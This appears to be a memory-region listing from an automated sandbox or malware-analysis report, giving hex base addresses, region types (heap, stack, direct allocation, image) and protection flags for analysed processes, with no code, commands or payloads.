9B5AF7F000
stack
page read and write
26570040000
heap
page read and write
7F000000
direct allocation
page read and write
7FF738F6D000
unkown
page readonly
2C1E000
unkown
page read and write
B20737D000
stack
page read and write
23FE08B5000
heap
page read and write
15F97000
direct allocation
page read and write
1F1B0E90000
heap
page read and write
1F1B4508000
trusted library allocation
page read and write
3056000
heap
page read and write
248FE364000
heap
page read and write
25F0000
heap
page read and write
241E000
stack
page read and write
7F730000
direct allocation
page read and write
7F6BF000
direct allocation
page read and write
27B094EE000
heap
page read and write
20D6962C000
heap
page read and write
33A6000
heap
page read and write
4CD000
unkown
page read and write
3587000
heap
page read and write
7EC70000
direct allocation
page read and write
1574E000
stack
page read and write
88D000
heap
page read and write
7EFFF000
direct allocation
page read and write
7FF6C36AD000
unkown
page write copy
6820000
heap
page read and write
20B1994C000
heap
page read and write
14C571E7000
heap
page read and write
2760000
heap
page read and write
1E90D000
stack
page read and write
296D000
direct allocation
page read and write
26F6B380000
heap
page read and write
2D80000
heap
page read and write
20B19890000
heap
page read and write
2998000
direct allocation
page read and write
7FF6C36C9000
unkown
page readonly
FCD6DFE000
stack
page read and write
27B097CC000
heap
page read and write
270E000
unkown
page read and write
97000
stack
page read and write
6020000
trusted library allocation
page read and write
15870000
remote allocation
page read and write
7FF6C36CC000
unkown
page write copy
7FF6C36AD000
unkown
page write copy
20B19627000
heap
page read and write
7FF6C36B1000
unkown
page read and write
20E1C140000
heap
page read and write
235F56E0000
heap
page read and write
29EDF950000
heap
page read and write
7FF6C3670000
unkown
page readonly
27B09516000
heap
page read and write
97000
stack
page read and write
7FF7E18E1000
unkown
page execute read
7FF6C36CD000
unkown
page readonly
31AE000
heap
page read and write
33EF000
stack
page read and write
2966000
direct allocation
page read and write
45F000
unkown
page write copy
2AF98B55000
heap
page read and write
7C86BCE000
stack
page read and write
26F699A5000
heap
page read and write
1F402650000
heap
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
7FF6C36B9000
unkown
page read and write
27B094EC000
heap
page read and write
1E44F000
stack
page read and write
34B0000
heap
page read and write
2879000
heap
page read and write
7EFFF000
direct allocation
page read and write
7ED70000
direct allocation
page read and write
7FF6C36CC000
unkown
page write copy
7FF7E18E0000
unkown
page readonly
23FE08A2000
heap
page read and write
2390000
direct allocation
page read and write
20B1BE20000
heap
page read and write
1F400DC3000
heap
page read and write
1F4033C0000
heap
page read and write
1CD34727000
heap
page read and write
1F1B2BCB000
trusted library allocation
page read and write
7FFD9B9B2000
trusted library allocation
page read and write
158BE000
stack
page read and write
1C132D0C000
heap
page read and write
7FF6C36A2000
unkown
page readonly
882000
heap
page read and write
1F1CAE61000
heap
page read and write
2FD5000
stack
page read and write
2E30000
heap
page read and write
7FF6C3670000
unkown
page readonly
808000
heap
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
26F699FA000
heap
page read and write
45F000
unkown
page read and write
20D69920000
heap
page read and write
26F69950000
heap
page read and write
7FF6C3671000
unkown
page execute read
7FF6C3671000
unkown
page execute read
1546F000
stack
page read and write
15271750000
heap
page read and write
7F5A0000
direct allocation
page read and write
7F4000
heap
page read and write
261A000
direct allocation
page read and write
1CD34955000
heap
page read and write
27B09512000
heap
page read and write
235F56B5000
heap
page read and write
228A000
direct allocation
page read and write
7FF6C36A2000
unkown
page readonly
15A56000
heap
page read and write
7FF7E1A78000
unkown
page readonly
7FF6C36C9000
unkown
page readonly
7FF6C3670000
unkown
page readonly
56D6FE000
stack
page read and write
7FF6C36C9000
unkown
page readonly
339E000
stack
page read and write
7FF622766000
unkown
page write copy
6F9000
heap
page read and write
7F730000
direct allocation
page read and write
19D000
stack
page read and write
56D977000
stack
page read and write
20D695A0000
heap
page read and write
26F699FA000
heap
page read and write
19D000
stack
page read and write
15C71000
heap
page read and write
7FF7E19FE000
unkown
page readonly
820000
heap
page read and write
7FF6C36C9000
unkown
page readonly
20E1BFD0000
heap
page read and write
1F1B2720000
heap
page read and write
2E0B000
heap
page read and write
7FF6C36BF000
unkown
page read and write
7FF6C36B5000
unkown
page read and write
6850000
heap
page read and write
9B5AB2D000
stack
page read and write
26F699F6000
heap
page read and write
7FF6C3671000
unkown
page execute read
7FF7E18E0000
unkown
page readonly
7FF6C36CC000
unkown
page write copy
7FFD9BC00000
trusted library allocation
page read and write
7FF6C36A2000
unkown
page readonly
23CA000
direct allocation
page read and write
1F1CAE58000
heap
page read and write
7F640000
direct allocation
page read and write
26F69A2B000
heap
page read and write
1F1B4394000
trusted library allocation
page read and write
44E4000
heap
page read and write
20E1BEB0000
heap
page read and write
2290000
heap
page read and write
2FCE000
stack
page read and write
7FFD9BC90000
trusted library allocation
page read and write
B2073FE000
stack
page read and write
2E47000
heap
page read and write
1F1CB167000
heap
page read and write
7ED50000
direct allocation
page read and write
27B09516000
heap
page read and write
800000
heap
page read and write
1F1B26C0000
trusted library allocation
page read and write
27B09513000
heap
page read and write
2900000
direct allocation
page read and write
1F1CB150000
heap
page read and write
15EB0000
heap
page read and write
7FF6C36A2000
unkown
page readonly
1D6D0ECE000
heap
page read and write
7EE6F000
direct allocation
page read and write
56D77E000
stack
page read and write
7FF6C36A2000
unkown
page readonly
15B6E000
heap
page read and write
5ED4CFF000
stack
page read and write
20B1965D000
heap
page read and write
27B09516000
heap
page read and write
1F1CAB4F000
heap
page read and write
23F0000
heap
page read and write
2D3D000
heap
page read and write
3FEC000
direct allocation
page read and write
248FDF90000
heap
page read and write
2D4E000
stack
page read and write
154AE000
stack
page read and write
810000
direct allocation
page execute and read and write
20B19580000
heap
page read and write
1F402680000
heap
page read and write
7FF6C36AD000
unkown
page read and write
287E000
heap
page read and write
7FF6C3671000
unkown
page execute read
2170000
heap
page read and write
26F69960000
heap
page read and write
20B1965D000
heap
page read and write
27B09513000
heap
page read and write
15271730000
heap
page read and write
7FF6C36A2000
unkown
page readonly
20B19655000
heap
page read and write
20B19659000
heap
page read and write
7FF6C36AD000
unkown
page read and write
489A4FD000
stack
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
7FF7E1A78000
unkown
page readonly
1D6D1060000
heap
page read and write
15CF0000
heap
page read and write
20D69570000
heap
page read and write
7ECF0000
direct allocation
page read and write
2881000
heap
page read and write
7FF6C36C9000
unkown
page readonly
7FF7E19FE000
unkown
page readonly
7FF6C36A2000
unkown
page readonly
86E000
heap
page read and write
274E000
stack
page read and write
27B09515000
heap
page read and write
89E000
heap
page read and write
2AF98810000
heap
page read and write
23FE089B000
heap
page read and write
7EF20000
direct allocation
page read and write
4CB000
unkown
page read and write
7FFD9BC10000
trusted library allocation
page read and write
246EE9B5000
heap
page read and write
2283000
direct allocation
page read and write
478000
direct allocation
page execute and read and write
8A4000
heap
page read and write
7FE000
heap
page read and write
2844000
heap
page read and write
7FF6C36C9000
unkown
page readonly
3556000
heap
page read and write
14C571C4000
heap
page read and write
2190000
heap
page read and write
20D69580000
heap
page read and write
29EDFC85000
heap
page read and write
7F6FF000
direct allocation
page read and write
28FE000
stack
page read and write
27B09516000
heap
page read and write
7FF6C36C9000
unkown
page readonly
246EE5B0000
heap
page read and write
300F000
stack
page read and write
285A000
heap
page read and write
21A42B86000
heap
page read and write
2E38000
heap
page read and write
31A6000
heap
page read and write
A94D5BE000
stack
page read and write
406D000
direct allocation
page read and write
27B09512000
heap
page read and write
7FD10000
direct allocation
page read and write
271E31C4000
heap
page read and write
2AF98B50000
heap
page read and write
7F020000
direct allocation
page read and write
7FF6C36A2000
unkown
page readonly
1F400D3C000
heap
page read and write
4F20000
heap
page read and write
271E3203000
heap
page read and write
2D00000
heap
page read and write
235F56C0000
heap
page read and write
7FF6C3670000
unkown
page readonly
21A42AB3000
heap
page read and write
26F69A07000
heap
page read and write
21A42AB0000
heap
page read and write
2906000
direct allocation
page read and write
20B19659000
heap
page read and write
7FF7E1A63000
unkown
page read and write
266D000
direct allocation
page read and write
1F0000
heap
page read and write
1548F000
stack
page read and write
1F400DAD000
heap
page read and write
1F400DC8000
heap
page read and write
2642000
direct allocation
page read and write
1F1B2D72000
trusted library allocation
page read and write
56DA7E000
stack
page read and write
1F0000
heap
page read and write
7FF6C36C9000
unkown
page readonly
7FFD9BBD0000
trusted library allocation
page read and write
31A0000
heap
page read and write
2C2D000
stack
page read and write
271E3190000
heap
page read and write
2249000
direct allocation
page read and write
7FF6C36AD000
unkown
page write copy
2683000
direct allocation
page read and write
2AF988AE000
heap
page read and write
7FF6C3671000
unkown
page execute read
256D000
stack
page read and write
4854000
heap
page read and write
7FFD9BB50000
trusted library allocation
page read and write
271E31E7000
heap
page read and write
295F000
direct allocation
page read and write
2E47000
heap
page read and write
7FF7E19FE000
unkown
page readonly
2D51000
heap
page read and write
1F0000
heap
page read and write
478000
direct allocation
page execute and read and write
7FF7E18E0000
unkown
page readonly
246EE9B0000
heap
page read and write
21A42B84000
heap
page read and write
248FE365000
heap
page read and write
7FF6C36A2000
unkown
page readonly
296A000
direct allocation
page read and write
23FE08B5000
heap
page read and write
F1CACFC000
stack
page read and write
1D6D0EE2000
heap
page read and write
7FF6C36AD000
unkown
page write copy
26F69A27000
heap
page read and write
7FF6C36CC000
unkown
page write copy
1F1B0D60000
heap
page read and write
7FF6C36B1000
unkown
page read and write
7FF6C3671000
unkown
page execute read
21A428A0000
heap
page read and write
25E0000
heap
page read and write
7FF622751000
unkown
page execute read
7FF6C36CD000
unkown
page readonly
287B000
heap
page read and write
248FE370000
heap
page read and write
7EFF0000
direct allocation
page read and write
20B1963D000
heap
page read and write
15703000
heap
page read and write
9B5AE7E000
stack
page read and write
2750000
heap
page read and write
20B19659000
heap
page read and write
235F5787000
heap
page read and write
2BBE000
stack
page read and write
7FF7E18E1000
unkown
page execute read
159BF000
stack
page read and write
7CB000
heap
page read and write
7FF6C36BF000
unkown
page read and write
474000
direct allocation
page execute and read and write
1D6D1065000
heap
page read and write
1F400DCC000
heap
page read and write
2B10000
heap
page read and write
1F400DC8000
heap
page read and write
1C130EA0000
heap
page read and write
1F1CAE04000
heap
page read and write
1F1B0D9E000
heap
page read and write
2D67000
heap
page read and write
7FF6C3670000
unkown
page readonly
155AE000
stack
page read and write
7FF6C36A2000
unkown
page readonly
7FF6C3671000
unkown
page execute read
2820000
heap
page read and write
235F5760000
heap
page read and write
7F3F0000
direct allocation
page read and write
E54E48B000
stack
page read and write
2D6E000
heap
page read and write
842000
heap
page read and write
77CBBFF000
stack
page read and write
4184000
direct allocation
page read and write
7FF6C3670000
unkown
page readonly
1CF2DFE000
stack
page read and write
7FF6C36A2000
unkown
page readonly
2AAF000
stack
page read and write
1C130ED0000
heap
page read and write
1F400DCC000
heap
page read and write
7EFA0000
direct allocation
page read and write
7FDE0000
direct allocation
page read and write
27B09513000
heap
page read and write
7FF6C3670000
unkown
page readonly
1F1B4762000
trusted library allocation
page read and write
2D37000
heap
page read and write
2C70000
heap
page read and write
29EDFA23000
heap
page read and write
C8006FE000
stack
page read and write
7CB000
heap
page read and write
489A57E000
stack
page read and write
299F000
stack
page read and write
2CEE000
stack
page read and write
7F020000
direct allocation
page read and write
286B000
heap
page read and write
7EFB0000
direct allocation
page read and write
27B094E0000
heap
page read and write
355F000
heap
page read and write
4B80000
trusted library allocation
page read and write
7FF6C3671000
unkown
page execute read
2916000
direct allocation
page read and write
29B5000
stack
page read and write
7FF6C36A2000
unkown
page readonly
7F660000
direct allocation
page read and write
33A0000
heap
page read and write
7FF6C36A2000
unkown
page readonly
355E000
heap
page read and write
56DBFE000
stack
page read and write
2DB4000
heap
page read and write
20B19893000
heap
page read and write
2881000
heap
page read and write
7F660000
direct allocation
page read and write
7FF6C36A2000
unkown
page readonly
26E4EE60000
heap
page read and write
48AE000
stack
page read and write
20B19627000
heap
page read and write
7FF6C36CD000
unkown
page readonly
7FF6C36C4000
unkown
page read and write
7FFD9BB61000
trusted library allocation
page read and write
7FF7E1A64000
unkown
page write copy
7FF6C36B1000
unkown
page read and write
26F69A27000
heap
page read and write
7EE90000
direct allocation
page read and write
7FF7E1A68000
unkown
page read and write
21A447D0000
heap
page read and write
1E8CB000
stack
page read and write
97000
stack
page read and write
7EFF0000
direct allocation
page read and write
2D24000
heap
page read and write
4E20000
heap
page read and write
23FE08B8000
heap
page read and write
246EE625000
heap
page read and write
2490000
heap
page read and write
20E1C040000
heap
page read and write
CAF933C000
stack
page read and write
7FF6C3671000
unkown
page execute read
9B5AAAB000
stack
page read and write
15271799000
heap
page read and write
23D1000
direct allocation
page read and write
7FFD9BB70000
trusted library allocation
page execute and read and write
2CA5000
heap
page read and write
1F1CAD60000
heap
page execute and read and write
15DA1000
heap
page read and write
7F5A0000
direct allocation
page read and write
15A62000
heap
page read and write
20B1963E000
heap
page read and write
7FF6C36AD000
unkown
page read and write
FCD6CFC000
stack
page read and write
27B09754000
heap
page read and write
1F1C2BB2000
trusted library allocation
page read and write
1F400DC8000
heap
page read and write
478000
direct allocation
page execute and read and write
7EE50000
direct allocation
page read and write
287E000
heap
page read and write
7FF6C36B1000
unkown
page read and write
4DF0000
heap
page read and write
15700000
heap
page read and write
873000
heap
page read and write
35BE000
heap
page read and write
7FFD9BC70000
trusted library allocation
page read and write
155DE000
stack
page read and write
15720000
heap
page read and write
7FB000
heap
page read and write
27B09511000
heap
page read and write
20B1963F000
heap
page read and write
7FF6C36CD000
unkown
page readonly
7FF6C3671000
unkown
page execute read
7FF7E1A75000
unkown
page write copy
4CB000
unkown
page read and write
23FE0890000
heap
page read and write
153DF000
stack
page read and write
2D5E000
stack
page read and write
7F5E0000
direct allocation
page read and write
1E970000
heap
page read and write
56DC7B000
stack
page read and write
245E000
stack
page read and write
3020000
heap
page read and write
20B19940000
heap
page read and write
2E64000
heap
page read and write
2E4F000
heap
page read and write
2991000
direct allocation
page read and write
27B09515000
heap
page read and write
7F1000
heap
page read and write
1CF2EFE000
stack
page read and write
235F5787000
heap
page read and write
23FE0990000
heap
page read and write
27B09518000
heap
page read and write
2978000
direct allocation
page read and write
154DF000
stack
page read and write
7FFD9B9BD000
trusted library allocation
page execute and read and write
1F1CB140000
heap
page read and write
27B09519000
heap
page read and write
27B096B0000
heap
page read and write
27B09513000
heap
page read and write
1CD34620000
heap
page read and write
2871000
heap
page read and write
1CD34720000
heap
page read and write
B2072FD000
stack
page read and write
27B09513000
heap
page read and write
1F1B2B41000
trusted library allocation
page read and write
3FFD000
direct allocation
page read and write
2B0A000
stack
page read and write
1C132CF0000
heap
page read and write
2AF988A0000
heap
page read and write
20B19638000
heap
page read and write
294D000
direct allocation
page read and write
7F5000
heap
page read and write
152718D0000
heap
page read and write
2368000
direct allocation
page read and write
15C70000
heap
page read and write
19D000
stack
page read and write
1E94F000
stack
page read and write
1C130E30000
heap
page read and write
1F1B0E95000
heap
page read and write
FE0AAFC000
stack
page read and write
2C0F000
stack
page read and write
1F1B43BF000
trusted library allocation
page read and write
2691000
direct allocation
page read and write
271E31C0000
heap
page read and write
7FF6C36BF000
unkown
page read and write
852000
heap
page read and write
7FF6C36CD000
unkown
page readonly
7F6E0000
direct allocation
page read and write
23C3000
direct allocation
page read and write
7FF6C36BF000
unkown
page read and write
1F1B3FA5000
trusted library allocation
page read and write
15708000
heap
page read and write
1F400D98000
heap
page read and write
401000
unkown
page execute read
2AF988C8000
heap
page read and write
2A9A000
stack
page read and write
2E80000
heap
page read and write
2378000
direct allocation
page read and write
7FFD9BB6A000
trusted library allocation
page read and write
7FF6C3670000
unkown
page readonly
7EEFF000
direct allocation
page read and write
27B09514000
heap
page read and write
2A7A000
stack
page read and write
20B1962B000
heap
page read and write
7FF6C36BF000
unkown
page read and write
7FF738F51000
unkown
page execute read
26F6B930000
trusted library allocation
page read and write
271E33B0000
heap
page read and write
7F7EF000
direct allocation
page read and write
26F699FA000
heap
page read and write
27B09516000
heap
page read and write
2AFF000
stack
page read and write
267C000
direct allocation
page read and write
21A42B80000
heap
page read and write
7FF6C36BF000
unkown
page read and write
2E52000
heap
page read and write
2E07000
heap
page read and write
7FF6C36C9000
unkown
page readonly
7FF6C36C9000
unkown
page readonly
7FF6C3671000
unkown
page execute read
8A9000
heap
page read and write
7FF7E1A64000
unkown
page write copy
27B09513000
heap
page read and write
5BE30FC000
stack
page read and write
7F45F000
direct allocation
page read and write
7ED50000
direct allocation
page read and write
26F69A27000
heap
page read and write
27B09518000
heap
page read and write
26E4EAA0000
heap
page read and write
7EDDF000
direct allocation
page read and write
7FF6C36A2000
unkown
page readonly
7FF6C3670000
unkown
page readonly
7FF6C36C9000
unkown
page readonly
7FF7E1A5A000
unkown
page write copy
298A000
direct allocation
page read and write
3599000
heap
page read and write
7FF6C36BF000
unkown
page read and write
7FF6C3670000
unkown
page readonly
7FF6C36A2000
unkown
page readonly
2D61000
heap
page read and write
271E31A0000
heap
page read and write
1C130E80000
heap
page read and write
FE0ACFF000
stack
page read and write
14C570A0000
heap
page read and write
26570160000
heap
page read and write
14C571C0000
heap
page read and write
2DB0000
heap
page read and write
20B1965A000
heap
page read and write
7FF622766000
unkown
page read and write
20E1BFA4000
heap
page read and write
1CD34820000
heap
page read and write
15271778000
heap
page read and write
44E0000
heap
page read and write
20D695D0000
heap
page readonly
486C000
stack
page read and write
7FF622767000
unkown
page readonly
1F1B441A000
trusted library allocation
page read and write
26F699F6000
heap
page read and write
35BE000
heap
page read and write
2D0F000
stack
page read and write
7EFA0000
direct allocation
page read and write
29E0000
heap
page read and write
1F1B0DA0000
heap
page read and write
56D1DE000
stack
page read and write
20B1B620000
trusted library allocation
page read and write
27B09513000
heap
page read and write
5D0000
heap
page read and write
7FFD9BA6C000
trusted library allocation
page execute and read and write
7FF6C36C9000
unkown
page readonly
3520000
heap
page read and write
290F000
direct allocation
page read and write
C8008FE000
stack
page read and write
4DFD000
stack
page read and write
26E4EBA0000
heap
page read and write
7F510000
direct allocation
page read and write
7FF6C36A2000
unkown
page readonly
2844000
heap
page read and write
235F5787000
heap
page read and write
26F6B3F3000
heap
page read and write
2A01000
direct allocation
page read and write
2CBF000
stack
page read and write
27B09513000
heap
page read and write
56D9F9000
stack
page read and write
235F55C0000
heap
page read and write
474000
direct allocation
page execute and read and write
7FFD9BC50000
trusted library allocation
page read and write
850000
heap
page read and write
2946000
direct allocation
page read and write
7FF7E1A6D000
unkown
page readonly
CAF96FF000
stack
page read and write
7FF6C3671000
unkown
page execute read
298A000
direct allocation
page read and write
56DB7E000
stack
page read and write
2650000
direct allocation
page read and write
1F400D9C000
heap
page read and write
272E000
stack
page read and write
235A000
direct allocation
page read and write
235F5787000
heap
page read and write
B1DDAFB000
stack
page read and write
1CF2CFC000
stack
page read and write
152718D5000
heap
page read and write
1F400DC8000
heap
page read and write
2CDF000
stack
page read and write
7FF6C36AD000
unkown
page write copy
7FF6C36CD000
unkown
page readonly
1F1CB171000
heap
page read and write
E54E50E000
stack
page read and write
82B000
heap
page read and write
56D5FE000
stack
page read and write
8A5000
heap
page read and write
2D00000
heap
page read and write
45F000
unkown
page read and write
295C000
direct allocation
page read and write
56E6CC000
stack
page read and write
7FD70000
direct allocation
page read and write
1584E000
stack
page read and write
23B4000
direct allocation
page read and write
20B1965D000
heap
page read and write
248FE194000
heap
page read and write
246EE600000
heap
page read and write
1E840000
heap
page read and write
7FE49000
direct allocation
page read and write
9B5AFFA000
stack
page read and write
7F070000
direct allocation
page read and write
7FFD9BA66000
trusted library allocation
page read and write
26F699E0000
heap
page read and write
268A000
direct allocation
page read and write
7CE000
heap
page read and write
7FF6C3671000
unkown
page execute read
6F0000
heap
page read and write
3050000
heap
page read and write
248FE170000
heap
page read and write
1F1B26D0000
heap
page readonly
E54E58E000
stack
page read and write
74F000
stack
page read and write
7FF6C3670000
unkown
page readonly
27B09514000
heap
page read and write
2F4E000
stack
page read and write
7EED0000
direct allocation
page read and write
7FF6C36BF000
unkown
page read and write
21A447EC000
heap
page read and write
7FF6C36B1000
unkown
page read and write
56D47E000
stack
page read and write
7FF6C36C9000
unkown
page readonly
7FF6C3670000
unkown
page readonly
2E00000
heap
page read and write
1C130E60000
heap
page read and write
F6433FF000
unkown
page read and write
6490000
trusted library allocation
page read and write
1D040000
trusted library allocation
page read and write
1570D000
stack
page read and write
7EFFF000
direct allocation
page read and write
4850000
heap
page read and write
29FB000
stack
page read and write
C8007FF000
stack
page read and write
20B19659000
heap
page read and write
690000
heap
page read and write
26570083000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page execute and read and write
7FF6C36AD000
unkown
page read and write
1F1CAE10000
heap
page read and write
7F670000
direct allocation
page read and write
20B1962B000
heap
page read and write
7FF6C36C4000
unkown
page read and write
7FF6C3670000
unkown
page readonly
CAF97FF000
stack
page read and write
1F400DCE000
heap
page read and write
1E40E000
stack
page read and write
7FF6C36CD000
unkown
page readonly
1D6D0E30000
heap
page read and write
160F0000
direct allocation
page execute and read and write
7F020000
direct allocation
page read and write
23FE07B0000
heap
page read and write
88C000
heap
page read and write
15FF5000
heap
page read and write
1CD34840000
heap
page read and write
15A29BE000
stack
page read and write
2D9E000
stack
page read and write
26AC000
stack
page read and write
76E000
stack
page read and write
7F200000
direct allocation
page read and write
1F1C2BBE000
trusted library allocation
page read and write
284F000
heap
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
3560000
heap
page read and write
1F1CAD67000
heap
page execute and read and write
7FF6C36A2000
unkown
page readonly
1D6D0EC0000
heap
page read and write
3060000
heap
page read and write
78E000
stack
page read and write
7FFD9BC40000
trusted library allocation
page read and write
1E88C000
stack
page read and write
16187000
heap
page read and write
2B7A000
heap
page read and write
27B09513000
heap
page read and write
27B09514000
heap
page read and write
26DC000
stack
page read and write
26570044000
heap
page read and write
286F000
unkown
page read and write
26F69A2B000
heap
page read and write
4FB4000
heap
page read and write
1F400DA8000
heap
page read and write
15271796000
heap
page read and write
25E0000
heap
page read and write
248FE360000
heap
page read and write
295E000
stack
page read and write
1F1B469C000
trusted library allocation
page read and write
41958FF000
stack
page read and write
1E980000
heap
page read and write
27B09515000
heap
page read and write
7FF738F51000
unkown
page execute read
21A449C0000
heap
page read and write
7FF6C36AD000
unkown
page write copy
2D70000
heap
page read and write
7FF6C36C9000
unkown
page readonly
7AE000
heap
page read and write
3528000
heap
page read and write
4F2B000
stack
page read and write
26E4ED20000
heap
page read and write
26F69A2D000
heap
page read and write
26F6C130000
heap
page read and write
7CE000
heap
page read and write
7F070000
direct allocation
page read and write
1F402683000
heap
page read and write
2B1E000
unkown
page read and write
7FF6C36CD000
unkown
page readonly
26F69A0C000
heap
page read and write
1F1CAD70000
heap
page read and write
7FBA0000
direct allocation
page read and write
28B0000
heap
page read and write
A94D53E000
stack
page read and write
7EBE0000
direct allocation
page read and write
7FF6C3671000
unkown
page execute read
1E950000
heap
page read and write
26F699E7000
heap
page read and write
5BE31FE000
stack
page read and write
7FF6C36CD000
unkown
page readonly
7C86ACC000
stack
page read and write
84C000
heap
page read and write
16320000
direct allocation
page execute and read and write
20D69626000
heap
page read and write
4D30000
heap
page read and write
B20727C000
stack
page read and write
626000
heap
page read and write
60E000
stack
page read and write
7FF6C3671000
unkown
page execute read
5D0000
heap
page read and write
2382000
direct allocation
page read and write
351B000
stack
page read and write
613C0000
unkown
page readonly
1534F000
stack
page read and write
22A0000
heap
page read and write
7FF6C36AD000
unkown
page read and write
2D24000
heap
page read and write
246EE60C000
heap
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
1F1B26E0000
trusted library allocation
page read and write
1F1CB17A000
heap
page read and write
7FF7E1A78000
unkown
page readonly
7FF6C36CC000
unkown
page write copy
25F0000
heap
page read and write
1F400D30000
heap
page read and write
7AA000
heap
page read and write
77CB7EC000
stack
page read and write
21A428C0000
heap
page read and write
7FF6C36AD000
unkown
page write copy
27B09750000
heap
page read and write
408C000
direct allocation
page read and write
7F660000
direct allocation
page read and write
613CE000
unkown
page readonly
15721000
heap
page read and write
2760000
heap
page read and write
56D879000
stack
page read and write
7FFD9BA96000
trusted library allocation
page execute and read and write
7FF6C36CC000
unkown
page write copy
4430000
heap
page read and write
22E0000
heap
page read and write
7FF6227B9000
unkown
page readonly
877000
heap
page read and write
22F0000
direct allocation
page execute and read and write
7FF6C3670000
unkown
page readonly
20E1BFA0000
heap
page read and write
235F56B4000
heap
page read and write
29F3000
direct allocation
page read and write
56D193000
stack
page read and write
2D4A000
heap
page read and write
CCEE6FF000
stack
page read and write
2CBE000
stack
page read and write
2250000
direct allocation
page read and write
1C130ED9000
heap
page read and write
7FF6C36CC000
unkown
page write copy
880000
heap
page read and write
2B60000
heap
page read and write
23D8000
direct allocation
page read and write
26F699AC000
heap
page read and write
E54E87F000
stack
page read and write
7F070000
direct allocation
page read and write
613C1000
unkown
page execute read
23BC000
direct allocation
page read and write
7FFD9B9CB000
trusted library allocation
page read and write
4DC0000
heap
page read and write
6D0000
heap
page read and write
7FFD9BC60000
trusted library allocation
page read and write
7FF6C36C9000
unkown
page readonly
271E31EF000
heap
page read and write
23AD000
direct allocation
page read and write
29DE000
stack
page read and write
1F400D87000
heap
page read and write
23FE09D5000
heap
page read and write
2228000
direct allocation
page read and write
21A42870000
heap
page read and write
26570020000
heap
page read and write
7FF62275D000
unkown
page readonly
FCD6EFE000
stack
page read and write
2698000
direct allocation
page read and write
7FF6C3671000
unkown
page execute read
20B19639000
heap
page read and write
7FF6C36A2000
unkown
page readonly
3FA0000
direct allocation
page readonly
2D08000
heap
page read and write
2656FF40000
heap
page read and write
7EFA0000
direct allocation
page read and write
160F0000
trusted library allocation
page read and write
2D62000
heap
page read and write
35BE000
heap
page read and write
7FF6C36CC000
unkown
page write copy
7FF6C36BF000
unkown
page read and write
4CF000
unkown
page write copy
20B197F0000
heap
page read and write
613CA000
unkown
page read and write
1F1B2763000
trusted library allocation
page read and write
2740000
heap
page read and write
31A0000
heap
page read and write
7A0000
heap
page read and write
27B09514000
heap
page read and write
7FF6C36C4000
unkown
page read and write
14C57180000
heap
page read and write
2D5F000
stack
page read and write
7ED000
heap
page read and write
7FF6C36AD000
unkown
page read and write
27B09513000
heap
page read and write
7FF6C36B9000
unkown
page read and write
235F576C000
heap
page read and write
7FF6C36CD000
unkown
page readonly
7FF6C36A2000
unkown
page readonly
1D6D0EC7000
heap
page read and write
15271650000
heap
page read and write
7ECA0000
direct allocation
page read and write
There are 1336 hidden memdumps, click here to show them.